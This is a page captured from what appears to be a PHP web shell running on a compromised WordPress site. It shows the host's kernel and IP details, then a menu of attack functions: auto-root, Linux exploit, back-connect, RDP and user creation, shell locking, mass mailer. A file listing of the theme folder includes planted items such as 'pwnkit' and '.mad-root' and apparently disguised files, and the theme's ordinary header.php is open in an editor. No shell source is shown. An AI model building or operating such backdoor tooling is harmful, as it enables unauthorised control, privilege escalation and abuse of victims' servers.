Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
formation /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1.63
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
3.35
KB
-rw-r--r--
comments.php
3.15
KB
-rw-r--r--
content-aside.php
1.51
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content-page.php
637
B
-rw-r--r--
content-single.php
2.28
KB
-rw-r--r--
content.php
2.58
KB
-rw-r--r--
custom-css.js
807
B
-rw-r--r--
footer.php
2.29
KB
-rw-r--r--
functions.php
18.99
KB
-rw-r--r--
functionsbak.php
18.5
KB
-rw-r--r--
header.php
4.17
KB
-rw-r--r--
image.php
5.36
KB
-rw-r--r--
index.php
1.91
KB
-rw-r--r--
license.txt
14.96
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
no-results.php
1.15
KB
-rw-r--r--
page.php
1.03
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
1.69
KB
-rw-r--r--
rtl.css
47.04
KB
-rw-r--r--
screenshot.png
777.66
KB
-rw-r--r--
search.php
1.11
KB
-rw-r--r--
searchform.php
637
B
-rw-r--r--
sidebar.php
1.08
KB
-rw-r--r--
single.php
1.04
KB
-rw-r--r--
style.css
47.04
KB
-rw-r--r--
wpml-config.xml
1.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The Header for our theme. * * Displays all of the <head> section and everything up till <div id="main"> * * @package formation * @since formation 1.0 */ ?><!DOCTYPE html> <!--[if IE 8]> <html id="ie8" <?php language_attributes(); ?>> <![endif]--> <!--[if !(IE 8) ]><!--> <html <?php language_attributes(); ?>> <!--<![endif]--> <head> <meta charset="<?php bloginfo( 'charset' ); ?>" /> <meta name="viewport" content="width=device-width" /> <?php if(get_theme_mod('formation_global_favicon')) : ?> <link rel="shortcut icon" href="<?php echo esc_url(get_theme_mod('formation_global_favicon')); ?>" /> <?php endif; ?> <?php if(get_theme_mod('formation_global_apple_icon')) : ?> <link rel="apple-touch-icon" href="<?php echo esc_url(get_theme_mod('formation_global_apple_icon')); ?>"> <?php endif; ?> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" /> <!--[if lt IE 9]> <script src="<?php echo get_template_directory_uri(); ?>/js/html5.js" type="text/javascript"></script> <![endif]--> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <div id="wrap"> <div id="page" class="hfeed site"> <?php do_action( 'before' ); ?> <div id="masthead-wrap"> <div id="topbar_container"> <div class="topbar"> <?php $list_contact_options = array( array('telnumber', __( 'Telephone Number', 'formation'), 'phone'), array('mobile', __( 'Mobile Number', 'formation'), 'mobile'), array('email', __( 'Email Address', 'formation'), 'envelope'), array('address', __( 'Address', 'formation'), 'map-marker'), ); echo "<div class='topbar_content_left'>"; $arraycount = count($list_contact_options); for ($row = 0; $row < $arraycount; $row++) { if( get_theme_mod( $list_contact_options[$row][0] . '_textbox_header_one' ) ){ echo '<div class="contact ' . $list_contact_options[$row][0] . '"><i class="fa fa-' . $list_contact_options[$row][2] . '"></i> ' . get_theme_mod( $list_contact_options[$row][0] . '_textbox_header_one' ) . '</div>'; } } echo "</div>"; ?> <div class="topbar_content_right"><?php get_template_part( 'inc/socmed' ); ?></div> </div> </div> <header id="masthead" class="site-header header_container" role="banner"> <?php if ( get_theme_mod( 'formation_logo' ) ) : ?> <div class="site-logo"> <a href="<?php echo esc_url( home_url( '/' ) ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>" rel="home"><img src="<?php echo esc_url( get_theme_mod( 'formation_logo' ) ); ?>" alt="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>"></a> </div> <?php else : ?> <div class="site-introduction"> <h1 class="site-title"><a href="<?php echo home_url( '/' ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></h1> <p class="site-description"><?php bloginfo( 'description' ); ?></p> </div> <?php endif; ?> <nav role="navigation" class="site-navigation main-navigation"> <h1 class="assistive-text"><a href="#" title="<?php _e('Navigation Toggle', 'formation'); ?>"><?php _e( 'Menu', 'formation' ); ?></a></h1> <div class="assistive-text skip-link"> <a href="#content" title="<?php esc_attr_e( 'Skip to content', 'formation' ); ?>"><?php _e( 'Skip to content', 'formation' ); ?></a> </div> <?php wp_nav_menu( array( 'theme_location' => 'primary' ) ); ?> </nav><!-- .site-navigation .main-navigation --> </header><!-- #masthead .site-header --> </div><!-- #masthead-wrap --> <div class="header-image"> <?php $header_image = get_header_image(); if ( ! empty( $header_image ) ): ?> <a href="<?php echo esc_url( home_url( '/' ) ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>" rel="home"> <img src="<?php header_image(); ?>"/> </a> <?php endif; ?> </div> <div id="main" class="site-main">
Close